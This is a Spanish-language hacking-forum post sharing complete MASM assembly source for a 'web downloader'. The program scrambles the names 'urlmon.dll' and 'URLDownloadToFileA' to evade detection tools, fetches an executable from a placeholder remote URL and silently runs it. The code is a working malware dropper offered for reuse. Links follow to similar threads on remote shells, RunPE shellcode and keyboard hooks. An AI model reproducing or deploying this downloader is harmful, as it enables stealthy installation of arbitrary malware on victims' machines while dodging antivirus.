send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Downloader MASM

  • 0 Respuestas
  • 2132 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5311
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Junio 05, 2012, 04:42:49 pm »
Código: ASM
  1. ;Tiny Webdownloader by Aphex
  2. ;Hides use of URLDownloadToFileA to foil TDS
  3. ;http://iamaphex.cjb.net
  4. ;unremote@knology.net
  5.  
  6. .386
  7. .model flat, stdcall
  8. include \masm32\include\kernel32.inc
  9. includelib \masm32\lib\kernel32.lib
  10.  
  11. .data
  12. Url byte 'http://your.isp.goes.here/file.exe', 0
  13. Exe byte '~.exe', 0
  14. Scramble1 byte 'dll', 0
  15. Scramble2 byte '.', 0
  16. Scramble3 byte 'mon', 0
  17. Scramble4 byte 'url', 0
  18. Scramble5 byte 'A', 0
  19. Scramble6 byte 'File', 0
  20. Scramble7 byte 'To', 0
  21. Scramble8 byte 'Download', 0
  22. Scramble9 byte 'URL', 0
  23.  
  24. .data?
  25. UrlMonDll byte 11 dup (?)
  26. UrlDownload byte 19 dup (?)
  27. UrlMon dword ?
  28. UrlDownloadToFile dword ?
  29.  
  30. .code
  31. _main:
  32. ;unscrambles urlmon.dll
  33. invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
  34. invoke lstrcat, addr UrlMonDll, addr Scramble3
  35. invoke lstrcat, addr UrlMonDll, addr Scramble2
  36. invoke lstrcat, addr UrlMonDll, addr Scramble1
  37.  
  38. ;unscrambles URLDownloadToFileA
  39. invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
  40. invoke lstrcat, addr UrlDownload, addr Scramble8
  41. invoke lstrcat, addr UrlDownload, addr Scramble7
  42. invoke lstrcat, addr UrlDownload, addr Scramble6
  43. invoke lstrcat, addr UrlDownload, addr Scramble5
  44.  
  45. ;loads urlmon.dll
  46. invoke LoadLibrary, addr UrlMonDll
  47. mov UrlMon, eax
  48.  
  49. ;links URLDownloadToFileA dynamically
  50. invoke GetProcAddress, UrlMon, addr UrlDownload
  51. mov UrlDownloadToFile, eax
  52.  
  53. ;delete previous version
  54. invoke DeleteFile, addr Exe
  55.  
  56. ;downloads the exe
  57. push 0
  58. push 0
  59. push offset Exe
  60. push offset Url
  61. push 0
  62. call UrlDownloadToFile
  63.  
  64. ;runs the exe
  65. invoke WinExec, addr Exe, 0
  66.  
  67. ;exits
  68. invoke ExitProcess, 0
  69.  
  70. end _main

By X-Ray Cat
« Última modificación: Junio 03, 2013, 11:54:32 am por Expermicid »


 

¿Te gustó el post? COMPARTILO!



[FASM] Downloader

Iniciado por k0ws

Respuestas: 4
Vistas: 2759
Último mensaje Mayo 19, 2013, 04:24:27 pm
por mr.blood
[MASM] Pequeña PoC de shell remota

Iniciado por binary_death

Respuestas: 0
Vistas: 2144
Último mensaje Septiembre 01, 2013, 02:03:45 pm
por binary_death
[MASM] Shellcode RunPE

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2940
Último mensaje Junio 05, 2012, 04:44:43 pm
por ANTRAX
[MASM] Hook al teclado

Iniciado por binary_death

Respuestas: 0
Vistas: 2113
Último mensaje Septiembre 01, 2013, 01:59:57 pm
por binary_death
[MASM] GetModuleFileName Example (Beginner)

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2023
Último mensaje Junio 09, 2010, 12:31:17 pm
por ANTRAX